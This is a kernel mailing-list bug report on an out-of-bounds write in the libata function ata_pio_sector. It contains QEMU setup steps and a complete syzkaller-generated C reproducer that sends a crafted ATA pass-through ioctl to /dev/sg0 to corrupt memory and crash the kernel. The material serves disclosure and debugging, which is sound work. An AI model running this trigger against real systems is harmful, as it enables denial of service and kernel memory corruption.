On Thu, Jan 2, 2025 at 5:40 AM Niklas Cassel <cassel@xxxxxxxxxx> wrote:
>
> Hello reveliofuzzing,
>
> On Wed, Jan 01, 2025 at 09:17:02PM -0500, reveliofuzzing wrote:
> > Hi there,
> >
> > We found an out-of-bounds write in the function ata_pio_sector, which can cause
> > the kernel to crash. We would like to report it for your reference.
> >
> > ## Problem in ata_pio_sector
> > ata_pio_sector uses the following code to decide which page to use for the I/O:
> > page = sg_page(qc->cursg);
> > offset = qc->cursg->offset + qc->cursg_ofs;
> >
> > /* get the current page and offset */
> > page = nth_page(page, (offset >> PAGE_SHIFT));
> > offset %= PAGE_SIZE;
> > but we found that `offset` could be as high as 0x5000---qc->cursg_ofs==0x5000,
> > qc->cursg->offset == 0x0, making `page` point to a higher-position page that
> > belongs to other threads.
> >
> > ## Example crash
> > This out-of-bounds write can cause the kernel to crash at arbitrary places,
> > depending on when the corrupted page is accessed by the other thread.
> >
> > We found this problem can happen in Linux kernel 6.1~6.12. Here is one crash in
> > Linux kernel 6.1:
>
> Thank you for reporting!
>
> I assume that you haven't tested kernels earlier than 6.1?

Unfortunately, we haven't tested older kernels.

>
> (Looking at the driver, there was no major change between 6.0 and 6.1,
> so this bug has probably been there for a long time.)
>
>
> Could you please share your reproducer and your kernel config as well?

Below we report our setup for Linux kernel 6.12:

- General steps to reproduce the bug
1. Launch the VM
2. Copy the reproducer (compiled binary) into the VM
3. Run it with the root user
4. 
/*
[Report text kept verbatim; it continues step 4 of the reproduction steps.]

Wait for the bug to happen (generally takes less than 3 minutes)

- QEMU command (QEMU emulator version 4.2.1 (Debian 1:4.2-3ubuntu6.30))
qemu-system-x86_64 -m 2G -smp 2 -kernel /linux-6.12/bzImage \
    -append "console=ttyS0 root=/dev/sda earlyprintk=serial net.ifnames=0" \
    -drive file=./bullseye.img,format=raw \
    -net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 \
    -net nic,model=e1000 \
    -enable-kvm \
    -nographic \
    -pidfile vm.pid \
    2>&1 | tee vm.log

- VM image
It is created using Syzkaller's script:
https://github.com/google/syzkaller/blob/master/tools/create-image.sh

- bzImage
  - kernel: 6.12
  - GCC: Ubuntu 9.4.0-1ubuntu1~20.04.2
  - config: https://drive.google.com/file/d/1ZfeXgVadChVJtIGx5zMhBqHnmlomP3Hf/view?usp=sharing
  - compiled bzimage: https://drive.google.com/file/d/1MJf0WQ9_eztvuBcaBwCGC-rb7VBQtuac/view?usp=sharing

- reproducer
  - compiled binary: https://drive.google.com/file/d/1Q9prtQKi5LVrOwrFJ162eXzTwTnDUq5X/view?usp=sharing
  - C program:
*/

// autogenerated by syzkaller (https://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <setjmp.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#include <linux/capability.h>

/* Index of the top-level worker being forked by main(). */
static unsigned long long procid;

/* Per-thread state consulted by the SIGSEGV/SIGBUS handler. */
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;

/*
 * SIGSEGV/SIGBUS handler.
 *
 * Jumps back into the active NONFAILING() region when one is open
 * (skip_segv != 0) and the faulting address is below 1 MiB or above
 * 100 MiB.  In every other case, including while clone_ongoing is set,
 * the process exits with the signal number as its status.
 */
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
    if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0)
        exit(sig);

    const uintptr_t window_lo = 1 << 20;
    const uintptr_t window_hi = 100 << 20;
    const uintptr_t fault_addr = (uintptr_t)info->si_addr;

    const int recovering = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
    const int outside_window = fault_addr < window_lo || fault_addr > window_hi;

    if (recovering && outside_window)
        _longjmp(segv_env, 1);
    exit(sig);
}

/*
 * Ignores signals 0x20 and 0x21 through the raw rt_sigaction syscall and
 * installs segv_handler() for SIGSEGV and SIGBUS.
 */
static void install_segv_handler(void)
{
    struct sigaction ignore_sa;
    memset(&ignore_sa, 0, sizeof(ignore_sa));
    ignore_sa.sa_handler = SIG_IGN;
    syscall(SYS_rt_sigaction, 0x20, &ignore_sa, NULL, 8);
    syscall(SYS_rt_sigaction, 0x21, &ignore_sa, NULL, 8);

    struct sigaction fault_sa;
    memset(&fault_sa, 0, sizeof(fault_sa));
    fault_sa.sa_sigaction = segv_handler;
    fault_sa.sa_flags = SA_NODEFER | SA_SIGINFO;
    sigaction(SIGSEGV, &fault_sa, NULL);
    sigaction(SIGBUS, &fault_sa, NULL);
}

/*
 * Evaluates the given statement(s) with fault recovery enabled.  Yields 1
 * when they ran to completion and 0 when segv_handler() jumped back here.
 */
#define NONFAILING(...)                                      \
    ({                                                       \
        int ok = 1;                                          \
        __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
        if (_setjmp(segv_env) == 0) {                        \
            __VA_ARGS__;                                     \
        } else                                               \
            ok = 0;                                          \
        __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
        ok;                                                  \
    })

/* Terminates the process with status 1 when `failed` is non-zero. */
static void die_if(long failed)
{
    if (failed)
        exit(1);
}

/* Sleeps for `ms` milliseconds. */
static void sleep_ms(uint64_t ms)
{
    usleep(ms * 1000);
}

/* Returns CLOCK_MONOTONIC in milliseconds; exits(1) if the clock read fails. */
static uint64_t current_time_ms(void)
{
    struct timespec now;

    die_if(clock_gettime(CLOCK_MONOTONIC, &now));
    return (uint64_t)now.tv_sec * 1000 + (uint64_t)now.tv_nsec / 1000000;
}

/*
 * Formats `what` printf-style (at most 1023 characters) and writes it to
 * the existing file `file`.  Returns true only when the whole text was
 * written; on a short or failed write errno from write() is preserved.
 */
static bool write_file(const char* file, const char* what, ...)
{
    char text[1024];
    va_list ap;

    va_start(ap, what);
    vsnprintf(text, sizeof(text), what, ap);
    va_end(ap);
    text[sizeof(text) - 1] = 0;

    int text_len = strlen(text);
    int fd = open(file, O_WRONLY | O_CLOEXEC);
    if (fd == -1)
        return false;

    if (write(fd, text, text_len) != text_len) {
        int saved_errno = errno; /* close() may overwrite errno */
        close(fd);
        errno = saved_errno;
        return false;
    }
    close(fd);
    return true;
}

/*
 * Opens a device node and returns the result of open().
 *
 * a0 == 0xc / 0xb: opens "/dev/char/<a1>:<a2>" or "/dev/block/<a1>:<a2>"
 * read-write, with a1 and a2 truncated to 8 bits.
 * Otherwise a0 is a pointer to a path template; each '#' is replaced, left
 * to right, by successive decimal digits of a1 (least significant first)
 * and the result is opened with flags a2.
 */
static long syz_open_dev(volatile long a0, volatile long a1, volatile long a2)
{
    if (a0 == 0xc || a0 == 0xb) {
        char node[128];

        sprintf(node, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2);
        return open(node, O_RDWR, 0);
    }

    char path[1024];
    char* placeholder;

    strncpy(path, (char*)a0, sizeof(path) - 1);
    path[sizeof(path) - 1] = 0;
    while ((placeholder = strchr(path, '#'))) {
        *placeholder = '0' + (char)(a1 % 10);
        a1 /= 10;
    }
    return open(path, a2, 0);
}

/* Best-effort mount of fusectl; failure is ignored. */
static void setup_fusectl(void)
{
    if (mount(0, "/sys/fs/fuse/connections", "fusectl", 0, 0)) {
    }
}

/* Best-effort binderfs setup; every step may fail silently. */
static void setup_binderfs(void)
{
    if (mkdir("/dev/binderfs", 0777)) {
    }
    if (mount("binder", "/dev/binderfs", "binder", 0, NULL)) {
    }
    if (symlink("/dev/binderfs", "./binderfs")) {
    }
}

/* Bind-mounts src on dst; a failure other than ENOENT is fatal. */
static void bind_mount_optional(const char* src, const char* dst, unsigned flags)
{
    if (mount(src, dst, NULL, flags, NULL) && errno != ENOENT)
        exit(1);
}

/*
 * Builds a tmpfs-backed root under ./syz-tmp, bind-mounts /dev, /sys and a
 * few optional filesystems into it, mounts a fresh proc, then switches into
 * it (pivot_root when possible, followed by chroot).  Any mandatory step
 * that fails terminates the process with status 1.
 */
static void sandbox_common_mount_tmpfs(void)
{
    const unsigned bind_mount_flags = MS_BIND | MS_REC | MS_PRIVATE;
    const char* selinux_path = "./syz-tmp/newroot/selinux";

    write_file("/proc/sys/fs/mount-max", "100000");

    die_if(mkdir("./syz-tmp", 0777));
    die_if(mount("", "./syz-tmp", "tmpfs", 0, NULL));
    die_if(mkdir("./syz-tmp/newroot", 0777));

    die_if(mkdir("./syz-tmp/newroot/dev", 0700));
    die_if(mount("/dev", "./syz-tmp/newroot/dev", NULL, bind_mount_flags, NULL));

    die_if(mkdir("./syz-tmp/newroot/proc", 0700));
    die_if(mount("syz-proc", "./syz-tmp/newroot/proc", "proc", 0, NULL));

    die_if(mkdir("./syz-tmp/newroot/selinux", 0700));
    if (mount("/selinux", selinux_path, NULL, bind_mount_flags, NULL)) {
        /* Only a missing /selinux is tolerated; then try the sysfs location. */
        die_if(errno != ENOENT);
        bind_mount_optional("/sys/fs/selinux", selinux_path, bind_mount_flags);
    }

    die_if(mkdir("./syz-tmp/newroot/sys", 0700));
    die_if(mount("/sys", "./syz-tmp/newroot/sys", 0, bind_mount_flags, NULL));
    bind_mount_optional("/sys/kernel/debug", "./syz-tmp/newroot/sys/kernel/debug", bind_mount_flags);
    bind_mount_optional("/sys/fs/smackfs", "./syz-tmp/newroot/sys/fs/smackfs", bind_mount_flags);
    bind_mount_optional("/proc/sys/fs/binfmt_misc", "./syz-tmp/newroot/proc/sys/fs/binfmt_misc", bind_mount_flags);

    die_if(mkdir("./syz-tmp/pivot", 0777));
    if (syscall(SYS_pivot_root, "./syz-tmp", "./syz-tmp/pivot")) {
        /* pivot_root failed: just enter the directory and rely on chroot below. */
        die_if(chdir("./syz-tmp"));
    } else {
        die_if(chdir("/"));
        die_if(umount2("./pivot", MNT_DETACH));
    }
    die_if(chroot("./newroot"));
    die_if(chdir("/"));

    setup_binderfs();
    setup_fusectl();
}

static void loop(void);

/*
 * Common sandbox preparation: die with the parent, apply resource limits,
 * unshare several namespaces (best effort) and write a set of SysV IPC
 * sysctls.
 */
static void sandbox_common(void)
{
    prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
    if (getppid() == 1)
        exit(1);

    /* Applied in this order; setrlimit() results are deliberately unchecked. */
    static const struct {
        int resource;
        rlim_t value;
    } limits[] = {
        {RLIMIT_AS, (200 << 20)},
        {RLIMIT_MEMLOCK, 32 << 20},
        {RLIMIT_FSIZE, 136 << 20},
        {RLIMIT_STACK, 1 << 20},
        {RLIMIT_CORE, 128 << 20},
        {RLIMIT_NOFILE, 256},
    };
    for (unsigned k = 0; k < sizeof(limits) / sizeof(limits[0]); k++) {
        struct rlimit rlim;

        rlim.rlim_cur = rlim.rlim_max = limits[k].value;
        setrlimit(limits[k].resource, &rlim);
    }

    if (unshare(CLONE_NEWNS)) {
    }
    if (mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL)) {
    }
    if (unshare(CLONE_NEWIPC)) {
    }
    if (unshare(0x02000000)) {
    }
    if (unshare(CLONE_NEWUTS)) {
    }
    if (unshare(CLONE_SYSVSEM)) {
    }

    typedef struct {
        const char* name;
        const char* value;
    } sysctl_t;
    static const sysctl_t sysctls[] = {
        {"/proc/sys/kernel/shmmax", "16777216"},
        {"/proc/sys/kernel/shmall", "536870912"},
        {"/proc/sys/kernel/shmmni", "1024"},
        {"/proc/sys/kernel/msgmax", "8192"},
        {"/proc/sys/kernel/msgmni", "1024"},
        {"/proc/sys/kernel/msgmnb", "1024"},
        {"/proc/sys/kernel/sem", "1024 1048576 500 1024"},
    };
    unsigned i;
    for (i = 0; i < sizeof(sysctls) / sizeof(sysctls[0]); i++)
        write_file(sysctls[i].name, sysctls[i].value);
}

/*
 * Reaps children until `pid` itself is collected and returns its exit
 * status.  A negative pid (failed fork) terminates the process.
 */
static int wait_for_loop(int pid)
{
    int status = 0;

    die_if(pid < 0);
    while (waitpid(-1, &status, __WALL) != pid) {
    }
    return WEXITSTATUS(status);
}

/*
 * Clears CAP_SYS_PTRACE and CAP_SYS_NICE from the effective, permitted and
 * inheritable sets of the current process; exits(1) on capget/capset error.
 */
static void drop_caps(void)
{
    struct __user_cap_header_struct cap_hdr = {0};
    struct __user_cap_data_struct cap_data[2] = {0};

    cap_hdr.version = _LINUX_CAPABILITY_VERSION_3;
    cap_hdr.pid = getpid();
    die_if(syscall(SYS_capget, &cap_hdr, &cap_data));

    const int drop = (1 << CAP_SYS_PTRACE) | (1 << CAP_SYS_NICE);
    cap_data[0].effective &= ~drop;
    cap_data[0].permitted &= ~drop;
    cap_data[0].inheritable &= ~drop;
    die_if(syscall(SYS_capset, &cap_hdr, &cap_data));
}

/*
 * Forks the sandboxed worker.  The parent waits for it and returns its exit
 * status; the child sets up the sandbox and runs loop(), never returning.
 */
static int do_sandbox_none(void)
{
    if (unshare(CLONE_NEWPID)) {
    }

    int pid = fork();
    if (pid != 0)
        return wait_for_loop(pid);

    sandbox_common();
    drop_caps();
    if (unshare(CLONE_NEWNET)) {
    }
    write_file("/proc/sys/net/ipv4/ping_group_range", "0 65535");
    sandbox_common_mount_tmpfs();
    loop();
    exit(1);
}

/*
 * SIGKILLs `pid` and its process group, then waits for it.  After roughly
 * 100 ms of polling without success, every FUSE connection listed under
 * /sys/fs/fuse/connections is aborted before blocking in waitpid().
 */
static void kill_and_wait(int pid, int* status)
{
    kill(-pid, SIGKILL);
    kill(pid, SIGKILL);

    for (int attempt = 0; attempt < 100; attempt++) {
        if (waitpid(-1, status, WNOHANG | __WALL) == pid)
            return;
        usleep(1000);
    }

    DIR* connections = opendir("/sys/fs/fuse/connections");
    if (connections) {
        struct dirent* entry;

        while ((entry = readdir(connections)) != NULL) {
            if (strcmp(entry->d_name, ".") == 0 || strcmp(entry->d_name, "..") == 0)
                continue;

            char abort_path[300];
            snprintf(abort_path, sizeof(abort_path), "/sys/fs/fuse/connections/%s/abort", entry->d_name);

            int fd = open(abort_path, O_WRONLY);
            if (fd == -1)
                continue;
            /* One byte is written; it is the first byte of the path buffer. */
            if (write(fd, abort_path, 1) < 0) {
            }
            close(fd);
        }
        closedir(connections);
    }

    while (waitpid(-1, status, __WALL) != pid) {
    }
}

/* Per-test child setup: die with parent, own process group, OOM-kill first. */
static void setup_test(void)
{
    prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
    setpgrp();
    write_file("/proc/self/oom_score_adj", "1000");
}

static void execute_one(void);

#define WAIT_FLAGS __WALL

/*
 * Runs execute_one() in a fresh child forever.  Each child is polled every
 * 10 ms and killed once it has been running for 5000 ms.
 */
static void loop(void)
{
    int iter = 0;

    for (;; iter++) {
        int pid = fork();

        die_if(pid < 0);
        if (pid == 0) {
            setup_test();
            execute_one();
            exit(0);
        }

        int status = 0;
        uint64_t started_at = current_time_ms();

        for (;;) {
            sleep_ms(10);
            if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid)
                break;
            if (current_time_ms() - started_at >= 5000) {
                kill_and_wait(pid, &status);
                break;
            }
        }
    }
}

/* Resource table: r[0] holds the fd returned by syz_open_dev(). */
uint64_t r[1] = {0xffffffffffffffff};

/*
 * The test program proper: opens /dev/sg0 (template "/dev/sg#", id 0) and
 * issues ioctl cmd 1 on it with an 11-byte argument placed at 0x20000040,
 * immediately followed by the fd printed as "0x%016llx".
 * NOTE(review): on the sg driver cmd 1 is presumably SCSI_IOCTL_SEND_COMMAND
 * and 0x85 the ATA PASS-THROUGH(16) opcode -- confirm against kernel headers.
 */
void execute_one(void)
{
    intptr_t res = 0;

    if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
    }

    NONFAILING(memcpy((void*)0x20000000, "/dev/sg#\000", 9));
    res = -1;
    NONFAILING(res = syz_open_dev(/*dev=*/0x20000000, /*id=*/0, /*flags=*/0));
    if (res != -1)
        r[0] = res;

    NONFAILING(memcpy((void*)0x20000040, "\x00\x00\x00\x00\x42\x0d\x00\x00\x85\x0a\xaa", 11));
    NONFAILING(sprintf((char*)0x2000004b, "0x%016llx", (long long)r[0]));
    syscall(__NR_ioctl, /*fd=*/r[0], /*cmd=*/1, /*arg=*/0x20000040ul);
}

/*
 * Maps the fixed data area at 0x20000000 (16 MiB, RWX) with an inaccessible
 * page on either side, installs the fault handler and forks the workers.
 * A forked child in which do_sandbox_none() returns falls through and
 * continues this loop itself.
 */
int main(void)
{
    syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
            /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
    syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul,
            /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/7ul,
            /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
    syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
            /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/-1, /*offset=*/0ul);

    /* Unused placeholder emitted by the generator. */
    const char* reason;
    (void)reason;

    install_segv_handler();
    for (procid = 0; procid < 4; procid++) {
        if (fork() == 0) {
            do_sandbox_none();
        }
    }
    sleep(1000000);
    return 0;
}

/*
[End of the C program; quoted remainder of the message, kept verbatim.]
>
>
> Kind regards,
> Niklas
*/